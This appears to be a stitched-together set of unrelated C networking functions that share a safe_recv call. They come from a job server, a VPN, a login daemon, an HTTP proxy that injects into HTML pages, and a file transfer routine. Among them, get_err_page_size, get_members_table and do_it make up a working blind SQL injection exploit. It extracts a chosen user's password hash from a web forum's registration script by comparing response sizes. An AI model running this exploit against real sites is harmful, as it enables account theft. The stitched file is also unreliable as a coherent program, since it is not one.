int receive_host_list(int connection, host_list **list) { int err, num, i; host_port *hosts, *temp; host_list_node *runner; unsigned int id; num = 0; //size of array err = safe_recv(connection, &num, sizeof(int)); if(err < OKAY) return err; hosts = malloc(sizeof(host_port)*num); err = safe_recv(connection, hosts, sizeof(host_port)*num); if(err < OKAY) return err; err = safe_recv(connection, &id, sizeof(unsigned int)); if(err < OKAY) return err; //we malloc new host ports so that freeing is easy later //we cant just use the memory we allocated earlier as an array //or else it is impossible to free individual elements of the list temp = malloc(sizeof(host_port)); memcpy(temp, &hosts[0], sizeof(host_port)); *list = new_host_list(temp); runner = (*list)->head; (*list)->id = id; for(i = 1; i < num; i++) { temp = malloc(sizeof(host_port)); memcpy(temp, &hosts[i], sizeof(host_port)); runner = add_to_host_list(temp, runner); } return OKAY; }
int receive_file(int connection, data_size *file) { int err; err = safe_recv(connection, &(file->size), sizeof(size_t)); if(err < 0) problem("Recv failed size\n"); file->data = malloc(file->size); err = safe_recv(connection, file->data, file->size); if(err < 0) problem("Recv failed data\n"); err = safe_recv(connection, file->name, MAX_ARGUMENT_LEN*sizeof(char)); if(err < 0) problem("Recv failed name\n"); }
int request_add_lock(int connection) { int num = REQUEST_ADD_LOCK; do_rpc(&num); num = FAILURE; safe_recv(connection, &num, sizeof(int)); return num; }
int submit_job_to_server(char *host, int port, job *to_send, data_size *files, int num_files) { int connection, i, err; char ip[INET_ADDRSTRLEN]; i = make_connection_with(host, port, &connection); if(i < 0) { problem("Connection to server failed\n"); exit(-1); } i = ADD_JOB; do_rpc(&i); err = safe_send(connection, to_send, sizeof(job)); if(err < 0) problem("Send job failed, %d\n", err); safe_send(connection, &num_files, sizeof(int)); for(i = 0; i < num_files; i++) { err = safe_send(connection, &(files[i].size), sizeof(size_t)); if(err < 0) problem("Send failed size\n"); err = safe_send(connection, files[i].data, files[i].size); if(err < 0) problem("Send failed data\n"); err = safe_send(connection, files[i].name, MAX_ARGUMENT_LEN*sizeof(char)); if(err < 0) problem("Send failed name\n"); } safe_recv(connection, &i, sizeof(int)); close(connection); return i; }
int tell_to_unlock(int connection) { int num = UNLOCK; do_rpc(&num); num = FAILURE; safe_recv(connection, &num, sizeof(int)); return num; }
int get_err_page_size(struct sockaddr_in sa) { char buf[20000], *p; int s, sz; if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("connect"); exit(1); } sprintf(buf, "GET %s/%s?action=reg®submit=1&username=%s HTTP/1.1\r\n" "Host: %s\r\n" "Content-type: application/x-www-form-urlencoded\r\n" "User-Agent: %s\r\n" "Connection: close\r\n" "\r\n", path, SCRIPT, user, target_host, USERAGENT); safe_send(s, buf, strlen(buf), 0); safe_recv(s, buf, sizeof(buf), 0); if (!(p = strstr(buf, "\r\n\r\n"))) { printf("cant get error page\n"); exit(1); } sz = strlen(p)-4; close(s); return sz; }
static int netlink_route_results(int fd, char *b, size_t blen) { int len = 0; int left = blen; bzero(b, blen); while (left > 0) { int rtn = safe_recv(fd, b, left, 0); struct nlmsghdr *hdr = (struct nlmsghdr *) b; if (rtn <= 0) { perror("recv"); break; } if (hdr->nlmsg_type == NLMSG_DONE) { break; } b += rtn; left -= rtn; len += rtn; } return len; }
char *get_members_table(struct sockaddr_in sa) { static char members_table[64]; char buf[1024], *p, *q; int s; if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("connect"); exit(1); } sprintf(buf, "GET %s/%s?action=reg®submit=1&email1=+FROM HTTP/1.1\r\n" "Host: %s\r\n" "Content-type: application/x-www-form-urlencoded\r\n" "User-Agent: %s\r\n" "Connection: close\r\n" "\r\n", path, SCRIPT, target_host, USERAGENT); safe_send(s, buf, strlen(buf), 0); safe_recv(s, buf, sizeof(buf), 0); if (!((p = strstr(buf, "FROM "))) || !((q = strstr((p+5), " WHERE")))) { printf("cant get members table. maybe wrong path?\n"); exit(1); } *q = '\0'; strcpy(members_table, p+5); close(s); return members_table; }
static void do_one_client(int s, struct drcom_handle *h) { struct drcomcd_hdr cd_hdr; int s2; fd_set rfds; struct timeval t; int r; s2 = accept(s, NULL, NULL); if (s2 == -1 && errno != EINTR) { logerr("daemon: accept failed: %s", strerror(errno)); return; } FD_ZERO(&rfds); FD_SET(s2, &rfds); t.tv_sec = 2; t.tv_usec = 0; r = select(s2+1, &rfds, NULL, NULL, &t); if(r<=0){ logerr("accepted, but no data\n"); goto error; } if(!FD_ISSET(s2, &rfds)){ goto error; } r = safe_recv(s2, &cd_hdr, sizeof(struct drcomcd_hdr)); if (r != sizeof(struct drcomcd_hdr)){ logerr("daemon: recv: %s", strerror(errno)); goto error; } if (cd_hdr.signature != DRCOM_SIGNATURE) { logerr("Unknown signature\n"); goto error; } switch (cd_hdr.type) { case DRCOMCD_LOGIN: do_command_login(s2, h); break; case DRCOMCD_LOGOUT: do_command_logout(s2, h); break; case DRCOMCD_PASSWD: do_command_passwd(s2, h); break; default: break; } error: close(s2); return; }
void listen_for_connection(host_port *info) { pthread_t thread; int connection, connect_result, listener; connect_result = set_up_listener(info->port, &listener); connect_result = -1; while(1) { do { connect_result = wait_for_connection(listener, &connection); } while(connect_result < 0); connect_result = 0; safe_recv(connection, &connect_result, sizeof(int)); if(connect_result) { pthread_create(&thread, NULL, (void *(*)(void *))receive_int, (void *)&connection); } } }
int get_file(int sockfd, int fd, void (*f)(off_t, off_t)) { struct stat s; char buf[BUFSIZ]; off_t i; off_t j; if (safe_recv(sockfd, &s, sizeof(struct stat)) <= 0) return (-1); i = 0; while (i < s.st_size) { if ((j = recv(sockfd, &buf, BUFSIZ, 0)) <= 0) return (-1); write(fd, buf, j); if (f) f(i, s.st_size); i += j; } if (f) f(i, s.st_size); return (0); }
static int redir_conn_read(struct conn_t *conn, void *ctx) { redir_request *req = (redir_request *)ctx; uint8_t bb[PKT_MAX_LEN]; int s, r; if ((s=redir_cli_rewrite(req, conn)) != 0) return 0; r = safe_recv(conn->sock, bb, sizeof(bb)-1, 0); #if(_debug_) log_dbg("conn_read: %d clen=%d", r, req->clen); #endif if (r == 0) { if (req->read_closed && redir_cli_rewrite(req, conn) == 0) { log_dbg("done reading and writing"); redir_conn_finish(conn, req); return -1; } req->read_closed = 1; } else if (r < 0 && errno != EWOULDBLOCK && errno != EAGAIN) { log_dbg("ERRNO %d", errno); redir_conn_finish(conn, ctx); } else if (r > 0) { #ifdef ENABLE_REDIRINJECT bstring inject = inject_fmt(req, 0); #endif bb[r]=0; req->last_active = mainclock_tick(); #ifdef ENABLE_REDIRINJECT /** * */ if (inject && !req->headers) { char *newline = "\r\n\r\n"; char *eoh; bcatblk(req->hbuf, bb, r); if ((eoh = strstr((char *)req->hbuf->data, newline))) { int header_len = eoh - (char *)req->hbuf->data; bstring newhdr = bfromcstr(""); if (strncmp((char *)req->hbuf->data, "HTTP/1.", 7) || strncmp((char *)req->hbuf->data+8, " 2", 2)) { log_dbg("Not HTTP/1.X 2XX reply"); bcatblk(newhdr, req->hbuf->data, header_len + 4); } else { char *hdr, *p; int clen = 0; hdr = (char *)req->hbuf->data; while (hdr && *hdr) { int l; p = strstr(hdr, "\r\n"); if (p == hdr) { break; } else if (p) { l = (p - hdr); } else { l = (eoh - hdr); } if (!strncasecmp(hdr, "content-length:", 15)) { char c = hdr[l]; hdr[l] = 0; clen = req->clen = atoi(hdr+15); log_dbg("Detected Content Length %d", req->clen); hdr[l] = c; } else if (!strncasecmp(hdr, "content-type:", 13)) { if (strstr(hdr, "text/html")) { req->html = 1; } } else if (strcasestr(hdr, "content-encoding: gzip")) { req->gzip = 1; } else if (strcasestr(hdr, "transfer-encoding:") && strstr(hdr,"chunked")) { req->chunked = 1; } hdr += l + 2; if (!p) break; } hdr = (char *)req->hbuf->data; while (hdr && *hdr) { int l; int skip = 0; p = strstr(hdr, "\r\n"); if (p == hdr) { break; } else if (p) { l = (p - hdr); } else { l = (eoh - hdr); } if (req->html) { if (clen && !strncasecmp(hdr, "content-length:", 15)) { char tmp[128]; if (inject) clen += inject->slen; safe_snprintf(tmp, sizeof(tmp), "Content-Length: %d\r\n", clen); bcatcstr(newhdr, tmp); skip = 1; } else if (!strncasecmp(hdr, "connection:", 11)) { skip = 1; } else if (!strncasecmp(hdr, "accept-ranges:", 14)) { skip = 1; } } log_dbg("Resp Header [%d] %.*s%s", l, l, hdr, skip ? " [Skipped]" : ""); if (!skip) { bcatblk(newhdr, hdr, l + 2); } hdr += l + 2; if (!p) break; } bcatcstr(newhdr, "Connection: close\r\n"); /* process headers */ /* Is HTML */ /* Check content-encoding chunked */ /* Adjust content-length */ bcatblk(newhdr, newline, 2); if (req->html) { if (req->chunked) { char tmp[56]; safe_snprintf(tmp, sizeof(tmp), "%x\r\n", inject->slen); bcatcstr(newhdr, tmp); } bconcat(newhdr, inject); if (req->chunked) { bcatblk(newhdr, newline, 2); } } } bcatblk(newhdr, eoh + 4, req->hbuf->slen - header_len - 4); if (req->clen > 0) /* adjust clen */ req->clen -= (req->hbuf->slen - header_len - 4); redir_cli_write(req, newhdr->data, newhdr->slen); req->headers = 1; bdestroy(newhdr); } } else { #endif redir_cli_write(req, bb, r); if (req->clen > 0) req->clen -= r; #ifdef ENABLE_REDIRINJECT } #endif } /*log_dbg("leaving redir_conn_read()");*/ return 0; }
int vpn_recv(int fd, vpn_crypt_t *cry, vpn_proto_t type, void *buf, size_t buflen) { vpn_hdr_t hdr; gcry_cipher_hd_t hd = NULL; char bigpack[VPN_BIGPACKET], decpack[VPN_BIGPACKET], xiv[256], *s; int rr, rd, rc, rx; switch(type) { case VPN_CLIENT: hd = cry->hsrc; break; case VPN_SERVER: hd = cry->hdst; } memset(bigpack, 0, sizeof(bigpack)); memset(decpack, 0, sizeof(decpack)); /* read packet header */ memset(&hdr, 0, sizeof(hdr)); rr = recv(fd, &hdr, sizeof(hdr), 0); if(rr == -1) return rr; else if(!rr) return xmsg(0, VPN_DEBUG|VPN_INFO, "vpn_recv: lost connection, peer disconnected\n"); else if(rr != sizeof(hdr)) return xmsg(-1, VPN_DEBUG|VPN_INFO, "vpn_recv: partial recv of header not allowed\n"); xmsg(0, VPN_DEBUG, "received %d bytes header, checksum=%d and pad=%d\n", rr, hdr.checksum, hdr.pad); if(hdr.checksum > sizeof(bigpack)) return xmsg(-1, VPN_DEBUG|VPN_INFO, "packet too big: header checksum is %d\n", hdr.checksum); /* read packet data */ s = bigpack; rc = hdr.checksum; rx = 0; do { rr = safe_recv(fd, s, rc); if(rr == -1) return rr; else if(!rr) return xmsg(0, VPN_DEBUG|VPN_INFO, "vpn_recv: lost connection, peer disconnected\n"); xmsg(0, VPN_DEBUG, "read %d bytes of packet...\n", rr); s += rr; rx += rr; rc -= rr; } while(rx < hdr.checksum); /* generate iv to decrypt */ if(!cry->rndrecv) cry->rndrecv = initial_iv_random; memset(xiv, 0, sizeof(xiv)); gen_iv(xiv, cry->blklen, cry->rndrecv); /* xmsg(0, VPN_DEBUG, "recv using iv: %s\n", xiv); */ /* decrypt */ rd = xdecrypt(hd, cry->blklen, xiv, decpack, sizeof(decpack), bigpack, hdr.checksum); if(rd == -1 || rd != hdr.checksum) return xmsg(-1, VPN_DEBUG|VPN_INFO, "vpn_recv: cannot decrypt packet (%d != %d)\n", rd, hdr.checksum); /* copy data to user */ memcpy(buf, decpack, hdr.checksum - hdr.pad); /* set next iv */ cry->rndrecv = hdr.checksum - hdr.pad; return hdr.checksum - hdr.pad; }
void do_it() { char *table; struct sockaddr_in sa; int s, c, spread, pos, i, err_sz, sz; char buf[31337], email2[20000], hash[33], *p; resolve_host((struct sockaddr *)&sa, target_host); sa.sin_port = htons(target_port); printf("\nAttacking %s:%d (%s)\n\n", target_host, target_port, inet_ntoa(sa.sin_addr)); printf("Using script path: %s/%s\n", path, SCRIPT); err_sz = get_err_page_size(sa); printf("Got error page size: %d bytes\n", err_sz); table = get_members_table(sa); printf("Got members table: %s\n", table); printf("This may take a while...\n\n"); printf("* %s's password hash: ", user); fflush(stdout); for (c=beginchar; c<=endchar; c++) { for (spread=8,pos=0; spread; spread/=2) { sprintf(email2, "+and("); for (i=0; i<spread; i++) { sprintf(email2, "%s+mid(%s.password,%d,1)=char(%d)", email2, table, c, hexchars[pos+i]); if (i<spread-1) strcat(email2, "+or"); else strcat(email2, ")"); } if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("connect"); exit(1); } sprintf(buf, "GET %s/%s?action=reg®submit=1&email2=%s&username=%s HTTP/1.1\r\n" "Host: %s\r\n" "Content-type: application/x-www-form-urlencoded\r\n" "User-Agent: %s\r\n" "Connection: close\r\n\r\n", path, SCRIPT, email2, user, target_host, USERAGENT); safe_send(s, buf, strlen(buf), 0); memset(buf,0,sizeof(buf)); safe_recv(s, buf, sizeof(buf), 0); if (!(p = strstr(buf, "\r\n\r\n"))) { printf("something failed\n"); exit(1); } sz = strlen(p)-4; if (sz == err_sz) { if (spread == 1) { hash[c] = hexchars[pos]; } } else { if (spread == 1) { hash[c] = hexchars[pos+spread]; } pos += spread; } close(s); } printf("%c", hash[c]); fflush(stdout); } printf("\n\nDone.\n"); }
void receive_int(int *connection) { int incoming = 0; safe_recv(*connection, &incoming, sizeof(int)); printf("Received %d\n", incoming); }